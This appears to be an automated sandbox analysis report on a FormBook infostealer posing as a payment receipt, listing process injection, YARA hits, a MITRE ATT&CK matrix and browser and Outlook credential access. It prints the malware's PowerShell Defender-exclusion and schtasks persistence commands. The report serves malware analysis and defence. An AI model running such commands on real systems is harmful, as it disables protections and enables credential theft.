                Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: NULL target: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\wlanext.exeThread register set: target process: 7964
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\wlanext.exeThread APC queued: target process: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe
                Writes to foreign memory regions
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 6C0008Jump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe"Jump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe"Jump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fttQgpyzkkc" /XML "C:\Users\user\AppData\Local\Temp\tmp3A9E.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fttQgpyzkkc" /XML "C:\Users\user\AppData\Local\Temp\tmp6603.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exeProcess created: C:\Windows\SysWOW64\wlanext.exe "C:\Windows\SysWOW64\wlanext.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: VfJW2xm7a.exe, 00000010.00000002.4518347539.0000000001B61000.00000002.00000001.00040000.00000000.sdmp, VfJW2xm7a.exe, 00000010.00000000.2203703981.0000000001B61000.00000002.00000001.00040000.00000000.sdmp, VfJW2xm7a.exe, 00000012.00000002.4518707536.0000000000DE1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: VfJW2xm7a.exe, 00000010.00000002.4518347539.0000000001B61000.00000002.00000001.00040000.00000000.sdmp, VfJW2xm7a.exe, 00000010.00000000.2203703981.0000000001B61000.00000002.00000001.00040000.00000000.sdmp, VfJW2xm7a.exe, 00000012.00000002.4518707536.0000000000DE1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: VfJW2xm7a.exe, 00000010.00000002.4518347539.0000000001B61000.00000002.00000001.00040000.00000000.sdmp, VfJW2xm7a.exe, 00000010.00000000.2203703981.0000000001B61000.00000002.00000001.00040000.00000000.sdmp, VfJW2xm7a.exe, 00000012.00000002.4518707536.0000000000DE1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: VfJW2xm7a.exe, 00000010.00000002.4518347539.0000000001B61000.00000002.00000001.00040000.00000000.sdmp, VfJW2xm7a.exe, 00000010.00000000.2203703981.0000000001B61000.00000002.00000001.00040000.00000000.sdmp, VfJW2xm7a.exe, 00000012.00000002.4518707536.0000000000DE1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeQueries volume information: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeQueries volume information: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000011.00000002.4517196655.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.4517755223.00000000033C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2279407307.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2280315189.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.4517662913.0000000003370000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2281808721.0000000001580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.4518790088.0000000003230000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\wlanext.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\wlanext.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\wlanext.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\wlanext.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\wlanext.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\wlanext.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\wlanext.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\wlanext.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\wlanext.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000011.00000002.4517196655.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.4517755223.00000000033C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2279407307.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2280315189.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.4517662913.0000000003370000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2281808721.0000000001580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.4518790088.0000000003230000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Scheduled Task/Job                		1
                Scheduled Task/Job                		612
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		221
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                DLL Side-Loading                		1
                Scheduled Task/Job                		11
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                Abuse Elevation Control Mechanism                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                DLL Side-Loading                		612
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain Credentials113
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                Timestomp                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                DLL Side-Loading                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
